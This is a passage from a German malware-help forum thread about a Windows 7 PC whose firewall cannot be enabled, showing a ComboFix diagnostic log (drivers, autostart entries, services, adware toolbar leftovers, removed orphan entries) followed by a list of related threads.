2015-12-06 17:07 . 2015-11-17 06:43	11138400	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A07B6A54-5F91-456E-A52E-308E8C855C31}\mpengine.dll
2015-12-06 11:28 . 2015-12-06 11:34	--------	d-----w-	C:\FRST
2015-12-06 07:31 . 2015-12-06 12:26	192216	----a-w-	c:\windows\system32\drivers\MBAMSwissArmy.sys
2015-12-06 07:30 . 2015-12-06 07:30	--------	d-----w-	c:\program files (x86)\ Malwarebytes Anti-Malware 
2015-12-06 07:30 . 2015-10-05 08:50	63704	----a-w-	c:\windows\system32\drivers\mwac.sys
2015-12-06 07:30 . 2015-10-05 08:50	109272	----a-w-	c:\windows\system32\drivers\mbamchameleon.sys
2015-12-06 07:29 . 2015-12-06 07:29	--------	d-----w-	c:\users\Steffen\AppData\Local\Programs
2015-12-05 14:37 . 2015-11-17 06:43	11138400	----a-w-	c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-12-05 14:35 . 2015-12-05 14:35	--------	d-----w-	c:\program files (x86)\Microsoft Security Client
2015-12-05 14:35 . 2015-12-05 14:35	--------	d-----w-	c:\program files\Microsoft Security Client
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2015-12-07 08:42 . 2009-07-14 02:36	152576	----a-w-	c:\windows\SysWow64\msclmd.dll
2015-12-07 08:42 . 2009-07-14 02:36	175616	----a-w-	c:\windows\system32\msclmd.dll
2015-12-05 15:10 . 2009-07-13 23:19	328704	----a-w-	c:\windows\system32\services.exe
2015-12-01 14:04 . 2013-08-13 08:03	75472	----a-w-	c:\windows\system32\drivers\avnetflt.sys
2015-12-01 14:04 . 2013-08-13 08:03	162072	----a-w-	c:\windows\system32\drivers\avgntflt.sys
2015-12-01 14:04 . 2013-08-13 08:03	140448	----a-w-	c:\windows\system32\drivers\avipbb.sys
2015-11-25 20:17 . 2012-07-02 19:24	780488	----a-w-	c:\windows\SysWow64\FlashPlayerApp.exe
2015-11-25 20:17 . 2012-07-02 19:24	142536	----a-w-	c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2015-10-05 08:50 . 2012-07-04 13:18	25816	----a-w-	c:\windows\system32\drivers\mbam.sys
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmazonMP3DownloaderHelper"="c:\users\Steffen\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe" [2013-05-22 400704]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2010-05-14 248552]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2011-09-27 59240]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2015-12-01 803200]
"Avira SystrayStartTrigger"="c:\program files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe" [2015-10-14 66320]
.
c:\users\Steffen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
OpenOffice.org 3.3.lnk - c:\program files (x86)\OpenOffice.org 3\program\quickstart.exe [2010-12-13 1198592]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\drivers32]
"mixer6"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 AntiVirMailService;Avira Email-Schutz;c:\program files (x86)\Avira\AntiVir Desktop\avmailc7.exe;c:\program files (x86)\Avira\AntiVir Desktop\avmailc7.exe [x]
R2 AntiVirWebService;Avira Browser-Schutz;c:\program files (x86)\Avira\AntiVir Desktop\avwebg7.exe;c:\program files (x86)\Avira\AntiVir Desktop\avwebg7.exe [x]
R2 MBAMService;MBAMService;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe;c:\program files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [x]
R3 htcnprot;HTC NDIS Protocol Driver;c:\windows\system32\DRIVERS\htcnprot.sys;c:\windows\SYSNATIVE\DRIVERS\htcnprot.sys [x]
R3 HtcVCom32;HTC Diagnostic Port;c:\windows\system32\DRIVERS\HtcVComV64.sys;c:\windows\SYSNATIVE\DRIVERS\HtcVComV64.sys [x]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys;c:\windows\SYSNATIVE\drivers\mwac.sys [x]
R3 NisSrv;Microsoft-Netzwerkinspektion;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 Origin Client Service;Origin Client Service;c:\program files (x86)\Origin\OriginClientService.exe;c:\program files (x86)\Origin\OriginClientService.exe [x]
R3 Samsung UPD Service;Samsung UPD Service;c:\windows\System32\SUPDSvc.exe;c:\windows\SYSNATIVE\SUPDSvc.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;Intel(R) Turbo Boost Technology Monitor 2.0;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 SABI;SAMSUNG Kernel Driver For Windows 7;c:\windows\system32\Drivers\SABI.sys;c:\windows\SYSNATIVE\Drivers\SABI.sys [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 Avira.ServiceHost;Avira Service Host;c:\program files (x86)\Avira\Launcher\Avira.ServiceHost.exe;c:\program files (x86)\Avira\Launcher\Avira.ServiceHost.exe [x]
S2 avnetflt;avnetflt;c:\windows\system32\DRIVERS\avnetflt.sys;c:\windows\SYSNATIVE\DRIVERS\avnetflt.sys [x]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
S2 cvhsvc;Client Virtualization Handler;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE;c:\program files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE [x]
S2 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
S2 PassThru Service;Internet Pass-Through Service;c:\program files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe;c:\program files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [x]
S2 sftlist;Application Virtualization Client;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftlist.exe [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S2 UNS;Intel(R) Management and Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys;c:\windows\SYSNATIVE\DRIVERS\clwvd.sys [x]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys;c:\windows\SYSNATIVE\drivers\mbam.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 Sftfs;Sftfs;c:\windows\system32\DRIVERS\Sftfslh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftfslh.sys [x]
S3 Sftplay;Sftplay;c:\windows\system32\DRIVERS\Sftplaylh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftplaylh.sys [x]
S3 Sftredir;Sftredir;c:\windows\system32\DRIVERS\Sftredirlh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftredirlh.sys [x]
S3 Sftvol;Sftvol;c:\windows\system32\DRIVERS\Sftvollh.sys;c:\windows\SYSNATIVE\DRIVERS\Sftvollh.sys [x]
S3 sftvsa;Application Virtualization Service Agent;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe;c:\program files (x86)\Microsoft Application Virtualization Client\sftvsa.exe [x]
.
.
Inhalt des "geplante Tasks" Ordners
.
2015-12-07 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-07-02 20:17]
.
2015-12-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2015-01-08 06:34]
.
2015-12-07 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2015-01-08 06:34]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2011-02-27 11780712]
.
------- Zusätzlicher Suchlauf -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = hxxp://www.google.de/
mStart Page = hxxp://samsung.msn.com
mLocal Page = c:\windows\SysWOW64\blank.htm
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c:\users\Steffen\AppData\Roaming\Mozilla\Firefox\Profiles\zcu3fxwb.default\
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage - www.google.de
FF - user.js: network.cookie.cookieBehavior - 0se
FF - user.js: security.warn_viewing_mixed - false
FF - user.js: security.warn_viewing_mixed.show_once - false
FF - user.js: security.warn_submit_insecure - false
FF - user.js: security.warn_submit_insecure.show_once - false
FF - user.js: extensions.BabylonToolbar_i.babExt - 
FF - user.js: extensions.BabylonToolbar_i.srcExt - ss
FF - user.js: extensions.BabylonToolbar_i.id - 16123040000000000000062454f2a604
FF - user.js: extensions.BabylonToolbar_i.hardId - 16123040000000000000062454f2a604
FF - user.js: extensions.BabylonToolbar_i.instlDay - 15525
FF - user.js: extensions.BabylonToolbar_i.vrsn - 1.5.3.17
FF - user.js: extensions.BabylonToolbar_i.vrsni - 1.5.3.17
FF - user.js: extensions.BabylonToolbar_i.vrsnTs - 1.5.3.1715:08
FF - user.js: extensions.BabylonToolbar_i.prtnrId - babylon
FF - user.js: extensions.BabylonToolbar_i.prdct - BabylonToolbar
FF - user.js: extensions.BabylonToolbar_i.aflt - babsst
FF - user.js: extensions.BabylonToolbar_i.smplGrp - none
FF - user.js: extensions.BabylonToolbar_i.tlbrId - tb9
FF - user.js: extensions.BabylonToolbar_i.instlRef - sst
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Toolbar-10 - (no file)
Wow6432Node-HKU-Default-RunOnce-SPReview - c:\windows\System32\SPReview\SPReview.exe
Toolbar-Locked - (no file)
Toolbar-10 - (no file)
HKLM-Run-SynTPEnh - c:\program files (x86)\Synaptics\SynTP\SynTPEnh.exe
HKLM-Run-MSC - c:\program files\Microsoft Security Client\mssecex.exe
AddRemove-Freizeitkarte_BEL - c:\users\Steffen\Documents\Mein Garmin\Freizeitkarte_BEL\Uninstall.exe
AddRemove-Savings Sidekick - c:\program files (x86)\Savings Sidekick\Uninstall.exe
AddRemove-Updater Service - c:\programdata\IBUpdaterService\ibsvc.exe
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
------------------------ Weitere laufende Prozesse ------------------------
.
c:\program files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files (x86)\Avira\AntiVir Desktop\avguard.exe
c:\program files (x86)\CyberLink\Shared files\RichVideo.exe
c:\program files (x86)\Google\Update\1.3.29.1\GoogleCrashHandler.exe
c:\program files (x86)\Samsung\Easy Display Manager\WifiManager.exe
c:\program files (x86)\CyberLink\YouCam\YCMMirage.exe
c:\program files (x86)\Samsung\Easy Display Manager\dmhkcore.exe
c:\program files (x86)\Samsung\Samsung Recovery Solution 5\WCScheduler.exe
c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
c:\program files (x86)\Samsung\Movie Color Enhancer\MovieColorEnhancer.exe
c:\program files (x86)\Samsung\Samsung Support Center\SSCKbdHk.exe
c:\program files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
c:\program files (x86)\Samsung\Samsung Update Plus\SUPBackground.exe
c:\program files (x86)\SAMSUNG\EasySpeedUpManager\EasySpeedUpManager.exe
.
**************************************************************************
.
Zeit der Fertigstellung: 2015-12-07  11:28:46 - PC wurde neu gestartet
ComboFix-quarantined-files.txt  2015-12-07 10:28
.
Vor Suchlauf: 9 Verzeichnis(se), 84.443.250.688 Bytes frei
Nach Suchlauf: 14 Verzeichnis(se), 85.420.965.888 Bytes frei
.
- - End Of File - - 4FA076979DC296DC5156A3F278E5DE7C
         

Antwort

Themen zu WIN 7 Firewall nicht aktivierbar/Avira meldet Funde
antivirus, avira, cpu, desktop, device driver, dnsapi.dll, failed, firefox, flash player, helper, home, homepage, installation, internet, internet explorer, karte, prozesse, registry, rundll, scan, security, server, software, svchost.exe, trojan, usb, virus




Ähnliche Themen: WIN 7 Firewall nicht aktivierbar/Avira meldet Funde


  1. Windows 7: Avira meldet am 09.03.15 zwei Funde: pua/downloadsponsor.gen
    Log-Analyse und Auswertung - 11.03.2015 (3)
  2. Keine Internetverbindung, Firewall nicht aktivierbar, Explorer crash bei rechtsklick
    Plagegeister aller Art und deren Bekämpfung - 15.01.2015 (12)
  3. Windows 7/Avira Firewall nicht aktivierbar, Programme funktionieren nicht. Trojanerbefall?
    Log-Analyse und Auswertung - 23.09.2014 (14)
  4. Avira meldet bei Vollscan 33 Funde
    Plagegeister aller Art und deren Bekämpfung - 14.09.2014 (5)
  5. McAfee Virenscan und Firewall nicht aktivierbar, Internetverbindung weg
    Log-Analyse und Auswertung - 13.08.2014 (10)
  6. Laptop extrem langsam, Firewall nicht aktivierbar, Malwarebytes hat mehrere Viren gefunden
    Log-Analyse und Auswertung - 11.12.2013 (17)
  7. Avast Antivirus, Windows Firewall & Defender nicht aktivierbar - u.A. CoinMiner Virus
    Plagegeister aller Art und deren Bekämpfung - 01.10.2012 (3)
  8. Firewall so wie Windows Sicherheitscenter nicht aktivierbar
    Plagegeister aller Art und deren Bekämpfung - 25.07.2012 (2)
  9. Firewall so wie Windows Sicherheitscenter nicht aktivierbar
    Mülltonne - 25.07.2012 (2)
  10. Nach Security Center 2012 Virus auf Windows7 Sicherheitscenter und Firewall nicht aktivierbar...
    Plagegeister aller Art und deren Bekämpfung - 25.07.2012 (1)
  11. Avira meldet 4 Funde, was nun?
    Plagegeister aller Art und deren Bekämpfung - 07.05.2012 (44)
  12. Sicherheitscenterdienst u Firewall nicht aktivierbar nach smart fortress 2012
    Log-Analyse und Auswertung - 22.03.2012 (36)
  13. Win7 Firewall nicht mehr aktivierbar (Fehlercode 13)
    Log-Analyse und Auswertung - 25.01.2012 (3)
  14. Laptop lahmt, Win-Firewall nicht aktivierbar, mbam-funde, Trojaner-Verdacht..?
    Plagegeister aller Art und deren Bekämpfung - 24.02.2011 (64)
  15. Firewall nicht mehr aktivierbar
    Antiviren-, Firewall- und andere Schutzprogramme - 27.01.2011 (26)
  16. Winxp-Firewall nicht aktivierbar
    Antiviren-, Firewall- und andere Schutzprogramme - 15.12.2009 (1)
  17. Avira meldet Funde (Swizzor,Malware,...)
    Mülltonne - 11.08.2008 (4)

Zum Thema WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Hallo Forengemeinde, gestern bekam ich über meinen kostenfreien Virenscanner eine Mitteilung zu 2 Funden. Ich glaube diese Funde existieren schon länger auf meinem PC, da ich sie aber immer irgendwie - WIN 7 Firewall nicht aktivierbar/Avira meldet Funde...
Archiv
Du betrachtest: WIN 7 Firewall nicht aktivierbar/Avira meldet Funde auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.